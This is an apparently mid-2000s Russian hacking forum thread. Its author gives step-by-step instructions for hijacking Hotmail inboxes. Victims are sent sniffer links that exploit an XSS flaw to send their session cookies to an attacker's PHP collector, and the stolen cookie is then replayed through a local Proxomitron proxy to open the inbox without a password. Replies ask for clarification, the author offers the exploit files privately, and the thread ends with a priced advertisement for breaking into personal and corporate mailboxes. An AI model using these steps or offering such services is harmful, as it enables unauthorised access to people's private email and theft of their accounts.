Взлом ХотМайла линк сниффера: http://devarsiv.org/picture5.jpg http://devarsiv.org/a.gif http://www.devarsiv.org/a.txt при нажатии на линк у жертвы уплывут куки на аддресс: www.devarsiv.org/alex/alex.php Подмена куки и вход в инбокс обходя пасс: через Mozila Firefox в настройках браузера:tools,option,connection setting,manual proxy configuration HTTP proxy вводим 127.0.0.1 port 8080 ставим у себя галочку на: use this proxy server for all protocols идиом дальше: качаем http://www.devarsiv.org/proxomitron.zip открываем подручным текстовым редактором в проксеметроне файл default.cfg находим строку: In = TRUE Out = TRUE Key = "cookie:hott" Match = "*" Replace = "" и меж кавычек в Replace = "" вставляем наши куки теперь в браузере Mozila Firefox вводим этот аддрecc:http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и попадаем в инбокс обходя пасс просьба не злоупотреблять приведённым примером всем удачного xака !!
Чесно говоря ниче не понял! При нажатие на какой линк у жертвы уплывают куки??? про XSS здесь ниче не написано! Можно чуть по поподробней про сам угон куков!
нажав на линк одной из этих ссылок: http://devarsiv.org/picture5.jpg http://devarsiv.org/a.gif http://www.devarsiv.org/a.txt _____________________________________________________ куки уплывут на адрес: www.devarsiv.org/alex/alex.php подменяете куки в проксометроне. a в браузере Mozila Firefox пройдя по этой ссылке: http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и вы в инбоксе
Автор, не скажу что это лажа, но с той статьи, откуда ты это взял, мог и полные пути выдрать. Попробуй зайди на http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes Далее, где тут XSS, которая кукисы сдирает? Ты привел адреса снифферов, но их надо как-то применить
статья моя сам написал, не откуда не выдёргивал. объясню ещё раз, бага рабочая работает без проблем. эту ссылку: http://www.devarsiv.org/a.txt скиньте на хотмайл после нажатия на ссылку жертва попадет к себе-же в календарь сработает скрипт и куки уплывут на адрес: www.devarsiv.org/alex/alex.php далее: открываем текстовым редактором в проксометроне файл "default.cfg" находим строку In = TRUE Out = TRUE Key = "cookie:hott" Match = "*" Replace = "" и меж кавычек в Replace = " here" вставляем куки попaдём мы в инбокс только через Mozila Firefox изменим в настройках браузера:configuration HTTP proxy: на 127.0.0.1 порт 8080 после запустим сам проскометрон он должен будет ждать соединения на 8080 порту в браузере Мозила где вы изменили configuration HTTP proxy на 127.0.0.1 8080 вводим: http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и вы попaдаете в инбокс от куда угнали куки если не разберётесь стучите в асиу удачи!!
сам сплойт у меня на хосте выполнит скрипт, вам нужно, чтоб жертва просто прошла по одной любой из этих ссылок: http://devarsiv.org/a.gif http://devarsiv.org/picture5.jpg http://www.devarsiv.org/a.txt а на этот адрес: www.devarsiv.org/alex/alex.php придут куки
кто хочет ломануть мыло в домен-не хотмаил может воспользоваться уже готовым приведённым выше мной вариантом сам сплойт и ксс на хотмайле выкладывать в паблик не буду,кто реально нуждается стучите могу скинуть все нужные файлы, для этого вам понадобится хост с поддержкой Php
Короч я понял. Фишка в следующем. Верхний вариант -- это если ты уже в корень обленился, не собрать сплоит, не залить его и т.д. Нижний вариант, я имею ввиду предложение кому надо сплоит и т.п. -- это если ты не веришь, что это должно работать)))))))
2 Mukis неправильно ты всё понял, приведённый мной вариант полностью готов к использованию,моя ошибка я не правильно выложил путь к инбоксу я исправил по этой ссылки попадаем в инбокс: http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes сейчас сделаю видео
Прочитав твой первый пост сначало ниче не понял, т.к. ты там мало че обяснил! потом посмотрел видео и врубился!Суть: использование пасивной XSS на msn и CИ )))) МОЛОДЕЦ!
взлом мыла Предлагаю услуги взломы почтовых ящиков, в почтовых службах @mail.ru, @bk.ru, @inbox.ru, @list.ru, @rambler.ru, @yandex.ru. А так же комерчиские взломы почтовых ящиков фирм и предприятий например @samsung.com, @lg.ru. Расценки: Взлом одного ящика: 5 wmz (при взломе нескольких ящиков возможны скидки) Комерческий взлом: 500 wmz А так же могу показать баги или мануал по взлому ящика: 200 wmz В качестве гарантий пресылаю скриншот со взломанного ящика, и только после оплаты по средствам WebMoney (www.webmoney.ru), присылаю вам пароль от взломанного почтового ящика. Обращаться по e-mail адресу: [email protected]
